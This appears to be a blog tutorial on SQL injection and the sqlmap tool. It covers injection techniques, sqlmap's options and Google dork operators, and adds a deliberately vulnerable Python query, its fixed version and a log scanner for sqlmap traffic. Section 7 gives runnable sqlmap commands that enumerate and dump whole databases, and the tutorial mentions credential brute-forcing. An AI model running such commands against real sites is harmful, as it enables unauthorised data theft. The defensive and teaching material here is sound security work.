Mastering SQL Injection with Sqlmap: A Hands‑On Exploitation Guide
This article introduces the fundamentals of SQL injection, explains Sqlmap's five injection techniques, lists supported databases, shows installation methods, walks through essential commands and options, and provides practical examples for testing and exploiting vulnerable web applications.
Preface
Hello, I am Huang Wei. Many people have heard of SQL injection but do not fully understand it. This article explains what SQL injection is and how it works.
1. Overview of SQL Injection
SQL injection involves inserting SQL syntax into web form fields or URL query strings so that it is executed by the backend database. It works when the application builds its query by concatenating user-supplied input into the SQL text, so anything the input contains is parsed as part of the query. Common approaches include guessing table names and bypassing filters using logical operators such as AND or OR.
2. Sqlmap Injection Methods
Sqlmap supports five injection modes:
Time‑based blind injection
Boolean‑based blind injection
Error‑based injection
Union‑based injection
Stacked query injection
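The mechanism behind the overview above and the boolean-based technique just listed, as an added example that is not part of the original article: a deliberately vulnerable lookup that splices the request parameter into the SQL text, beside the hardened version that validates and binds it. The table, its rows and the function names are constructed for this illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data: an in-memory table standing in for a forum's post store.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER, title TEXT, hidden INTEGER)")
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)",
                     [(1, "Welcome", 0), (2, "Rules", 0), (3, "Draft", 1)])
    return conn

def fetch_titles_vulnerable(conn, post_id):
    # Deliberately vulnerable: the request parameter is spliced into the SQL text,
    # so any SQL it contains (AND/OR conditions, UNION, ...) is parsed as query syntax.
    sql = f"SELECT title FROM posts WHERE hidden = 0 AND id = {post_id} ORDER BY id"
    return [row[0] for row in conn.execute(sql)]

def fetch_titles_safe(conn, post_id):
    # Hardened: validate the type the parameter is meant to carry, then bind it.
    # A bound parameter travels as a value and is never interpreted as SQL.
    try:
        pid = int(post_id)
    except (TypeError, ValueError):
        return []
    sql = "SELECT title FROM posts WHERE hidden = 0 AND id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (pid,))]

if __name__ == "__main__":
    db = make_db()
    # A true and a false condition give different responses: exactly the
    # difference boolean-based blind injection is detected through.
    print(fetch_titles_vulnerable(db, "1 AND 1=1"))  # ['Welcome']
    print(fetch_titles_vulnerable(db, "1 AND 1=2"))  # []
    # An OR condition defeats the hidden = 0 filter and exposes the draft.
    print(fetch_titles_vulnerable(db, "1 OR 1=1"))   # ['Welcome', 'Rules', 'Draft']
    # The bound version rejects the same input outright.
    print(fetch_titles_safe(db, "1 OR 1=1"))         # []
```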
3. Databases Supported by Sqlmap
Sqlmap works with most mainstream databases, including MySQL, MongoDB, Oracle, SQL Server, Access, SQLite, and others.
4. Installing Sqlmap
You can either install the Python version of Sqlmap or download a pre‑compiled binary. Below are the download links given in the original article; prefer the official project site, https://sqlmap.org, and check what you download before running it.
Sqlmap.py: https://u062.com/file/7715018-453776489
Sqlmap.exe: https://u062.com/file/7715018-453776892
5. Basic Commands
Running sqlmap -h displays the basic command list. The -hh option prints the full, more detailed help. Screenshots in the original article illustrate the help output.
6. Options Overview
Key option groups are listed below (excerpt):
Options:
--version Show version and exit
-h, --help Show help and exit
-v VERBOSE Verbosity level 0‑6 (default 1)
Target:
-u URL, --url=URL Target URL
-d DIRECT Direct DB connection
-l LIST Parse URLs from Burp/WebScarab logs
-m BULKFILE Scan multiple targets from file
-r REQUESTFILE Load HTTP request from file
-g GOOGLEDORK Use Google dork results as targets
-c CONFIGFILE Load options from INI file
Request:
--data=DATA POST data string
--cookie=COOKIE HTTP Cookie header
--user-agent=AGENT Specify User‑Agent header
--random-agent Use random User‑Agent
--proxy=PROXY Use HTTP proxy
--delay=DELAY Delay between requests (seconds)
--timeout=TIMEOUT Connection timeout (default 30s)
Optimization:
-o Enable all optimizations
--predict-output Predict common query output
--keep-alive Use persistent HTTP(S) connections
--threads=THREADS Max concurrent requests (default 1)
Injection:
-p TESTPARAMETER Test specific parameter
--dbms=DBMS Force backend DBMS type
--os=OS Force backend OS type
--technique=TECH SQL injection techniques (default BEUST)
Detection:
--level=LEVEL Test level 1‑5 (default 1)
--risk=RISK Risk level 0‑3 (default 1)
--string=STRING True when string matches
--not-string=... False when string matches
--regexp=REGEXP Regex match on response
Enumeration:
-b, --banner Retrieve DBMS banner
--current-user Current DBMS user
--current-db Current database
--users Enumerate DBMS users
--passwords Enumerate password hashes
--privileges Enumerate user privileges
--dbs Enumerate databases
--tables Enumerate tables
--columns Enumerate columns
--dump Dump table data
Miscellaneous:
--batch Never ask for user input
--tor Use Tor network
--wizard Simple wizard for beginners
7. Practical Examples
1. Checking a URL for injection:
sqlmap -u "http://www.example.com/forum.php?id=1" --dbms=mysql -v 3 --dbs
2. Building a POST request:
sqlmap -u "http://www.example.com/login.php" --data="user=admin&pass=123" --dbms=mysql -v 3
3. Retrieving database and table information:
sqlmap -u "http://www.example.com/forum.php?id=1" --dbms=mysql -v 3 --tables -D VIP
sqlmap -u "http://www.example.com/forum.php?id=1" --dbms=mysql -v 3 --columns -T admin -D VIP
4. Dumping all data from a database:
sqlmap -u "http://www.example.com/forum.php?id=1" -D "VIP" --dump-all
5. Brute‑forcing usernames and passwords against a test web server (illustrated with screenshots in the original article).
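A defender-side complement to the examples above, added here and not from the original article: the requests those commands generate leave SQL syntax in the id parameter and, unless --user-agent or --random-agent from the options list is used, sqlmap's default User-Agent, which names the tool. This scanner flags both in constructed access-log lines; the log lines, regexes and function names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:12:00:01 +0000] "GET /forum.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:12:00:02 +0000] "GET /forum.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
203.0.113.5 - - [10/May/2024:12:00:02 +0000] "GET /forum.php?id=1%20AND%201%3D2 HTTP/1.1" 200 310 "-" "sqlmap/1.7 (https://sqlmap.org)"
198.51.100.7 - - [10/May/2024:12:00:03 +0000] "GET /forum.php?id=1%20UNION%20SELECT%20NULL%2CNULL-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.9 - - [10/May/2024:12:00:04 +0000] "GET /forum.php?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# SQL syntax that has no business in an id=-style parameter: AND/OR comparisons
# (boolean/time probing), UNION SELECT, sleep calls, stacked-query separators.
SQLI_TOKENS = re.compile(
    r"\b(?:AND|OR)\b\s+\S+\s*=\s*\S+|\bUNION\s+SELECT\b|\bSLEEP\s*\(|\bWAITFOR\b|--\s*$|;",
    re.I)

def parse_line(line):
    """Return the fields of one log line plus its decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["params"] = dict(parse_qsl(urlsplit(rec["target"]).query, keep_blank_values=True))
    return rec

def classify(rec):
    """List why a request looks like injection testing (empty list if it does not)."""
    reasons = []
    # sqlmap names itself in its default User-Agent; only a hint, since
    # --user-agent / --random-agent (listed above) replace it.
    if "sqlmap" in rec["ua"].lower():
        reasons.append("sqlmap default User-Agent")
    for name, value in rec["params"].items():
        if SQLI_TOKENS.search(value):
            reasons.append(f"SQL syntax in parameter {name!r}")
    return reasons

def scan(log_text):
    """Return (ip, target, reasons) for every suspicious line, in log order."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and (reasons := classify(rec)):
            hits.append((rec["ip"], rec["target"], reasons))
    return hits
```

Running scan(SAMPLE_LOG) flags the two sqlmap lines and the UNION request while leaving the plain id=1 and id=2 requests alone; counting hits per client IP is the natural next step for alerting.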
8. Google Dork Syntax
Common Google dork operators such as intitle:, inurl:, intext:, filetype:, site:, and others can be used to discover vulnerable pages and hidden resources.
intitle: Search page titles for keywords
inurl: Search URLs for keywords
intext: Search page content for keywords
filetype: Search for specific file extensions
site: Restrict search to a specific domain
link: Find pages linking to a URL
"" Exact phrase match
+ Must include term
- Exclude term
* Wildcard
| OR operator
Conclusion
SQL injection is a powerful technique that can be discovered relatively easily, while defending against it is straightforward. This guide provides a concise overview to help readers understand the basics, improve their testing skills, and raise awareness of web security.
